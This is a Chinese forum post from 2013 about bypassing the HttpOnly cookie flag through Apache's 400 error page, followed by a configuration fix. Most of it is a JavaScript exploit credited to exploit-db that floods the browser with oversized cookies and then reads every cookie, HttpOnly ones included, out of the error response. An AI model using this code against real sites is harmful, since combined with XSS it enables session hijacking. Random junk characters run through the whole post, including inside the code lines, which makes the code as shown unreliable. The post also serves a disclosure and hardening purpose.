很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
4 |; ^) V: c2 j' w% I9 R% m8 z- W/ N
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:& S( g* G; G) i- H& @5 U/ l/ W
; O9 v D3 a6 u; r
" ]: Y+ b, |& T7 F// http://www.exploit-db.com/exploits/18442/
1 o- O8 j7 t$ wfunction setCookies (good) {
6 x$ V4 v# y. t" U// Construct string for cookie value: F5 o) C. |: u+ g9 Q: C) e/ S
var str = "";7 [ y/ z# E$ `
for (var i=0; i< 819; i++) {0 A/ S$ v$ _# i9 I1 b7 s
str += "x";- {* d U; v r% l
}
- V' {8 B" k$ G% Z+ l1 g// Set cookies5 Q9 U: t3 G5 {+ |. o; z3 X
for (i = 0; i < 10; i++) {/ S6 s: J# `7 B; S
// Expire evil cookie
( {6 F0 i! O7 p1 H% w* i, pif (good) {
8 N4 ^# t2 a9 K! [9 e) Wvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";9 X4 f/ ]6 b" g/ ]( T. }! P4 \
}
; z. c" L5 C& u! R// Set evil cookie+ o. G$ z# ?9 t, F
else {$ C+ A- W, ~1 X& V( j# v/ w9 T
var cookie = "xss"+i+"="+str+";path=/";
}8 ~4 v1 t9 u! F7 N}# z* q- P9 `! ~4 G8 E
document.cookie = cookie;1 E/ |+ E. P2 ^- }! g
}
0 z& _6 c6 e# h$ L" W3 N}
5 n7 A% i2 _, p- ^2 ^function makeRequest() {' I7 t" i. W# {. _. d/ t
setCookies();
5 \4 |/ M1 n9 y8 `! pfunction parseCookies () {5 J, S9 E+ ~) H
var cookie_dict = {};( s$ Y5 h" F; C. R( o X
// Only react on 400 status
4 G& D& B* a- s bif (xhr.readyState === 4 && xhr.status === 400) {: A+ A7 z3 K4 g
// Replace newlines and match <pre> content
" L x6 l0 _- d2 o# ivar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
1 Q* B9 G7 ~# f/ x Fif (content.length) {+ N& ?/ K0 m5 m1 {; ^5 J5 Z+ t) O, Y
// Remove Cookie: prefix
# R6 k# z: L- f" x; n; ?+ scontent = content[1].replace("Cookie: ", "");* u, u( C$ k8 |
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);* a4 v: T, h* \/ u; D
// Add cookies to object7 O9 a9 l N+ F) ~/ V
for (var i=0; i<cookies.length; i++) {) c/ @$ ^8 o: U/ W$ T: I- u
var s_c = cookies.split('=',2);2 e1 ^9 B- H6 u* X. I
cookie_dict[s_c[0]] = s_c[1];
4 j5 j! ?: `1 Z$ X4 o- n" t}5 y" \2 z: e1 [( q" f; y
}. |) {0 d) x: |4 w
// Unset malicious cookies
* N7 A: p1 D! \ a/ Y1 G% o' Q; SsetCookies(true);
9 L# {$ z& u, Xalert(JSON.stringify(cookie_dict));% V! [; C9 c. X4 z
}
7 [' h1 x( U; B3 E9 A- T# E1 Z}
7 x/ v3 A; {* s0 f# [// Make XHR request
) V) P+ E( t6 dvar xhr = new XMLHttpRequest();
/ ?' q" g$ e& h* W, ~' Lxhr.onreadystatechange = parseCookies;3 Z( F6 p) A; g$ o# D9 v
xhr.open("GET", "/", true);. O7 i. m; s) Z! E$ K
xhr.send(null);" S; ?$ a- ]/ @9 `/ l
}* l; |' }( R, R O+ V
makeRequest();9 P$ r; R. A" o/ P7 p5 N% S: ?
9 e+ p9 O% ~ I, t. n
你就能看见华丽丽的400错误包含着cookie信息。
9 `+ O1 R1 |2 U! M$ _2 z1 q' F' M% r. r0 }1 V+ r
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
- e8 }9 z. k; F- J$ I
0 P: I+ J0 _, i* ]. H/ _: o/ Z' J* r修复方案:
7 \3 `/ [. Y, f# ]6 g q% N
|3 O/ C& S; m, yApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下+ ~9 N: l% s3 v. i" K$ p5 X
6 l, [: Y; D& @3 x/ }& ]$ e
In the event of a problem or error, Apachecan be configured to do one of four things,
9 ]$ v, r% `. D7 m( H; M; f" h
( y6 P5 O# C) |$ K. G1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
% ?0 z+ j u$ i) f3 ]# n# p2. output acustomized message输出一段信息
" s& ?2 Z% `2 a6 |3 d- [% V4 I3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
. X3 y& |- [( ?& _- B4. redirect to an external URL to handle theproblem/error转向一个外部URL
5 u9 s3 @# e& x7 z/ P) `3 }3 l
( b5 Q7 m( B1 `# g, l" j1 P经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容2 h- y) J# D, d: e; l
, C% P1 H7 z" ?: A
Apache配置:
) S5 N) C! v! }. ]: r; m3 z2 m( ^6 J* ~' `) `
ErrorDocument400 " security test"
" D$ q2 v2 G8 y) C& m4 k! I- v; o4 G8 q) d) K' Z S
当然,升级apache到最新也可:)。2 `1 L9 M3 I" N, Z7 C6 }
$ z, W- }+ {- Q5 ~
参考:http://httpd.apache.org/security/vulnerabilities_22.html6 c3 N/ {: S3 h" I% D( j9 B
$ I3 S# Y" B+ R2 x |
发表于 2013-4-19 19:15:43
收藏
支持
反对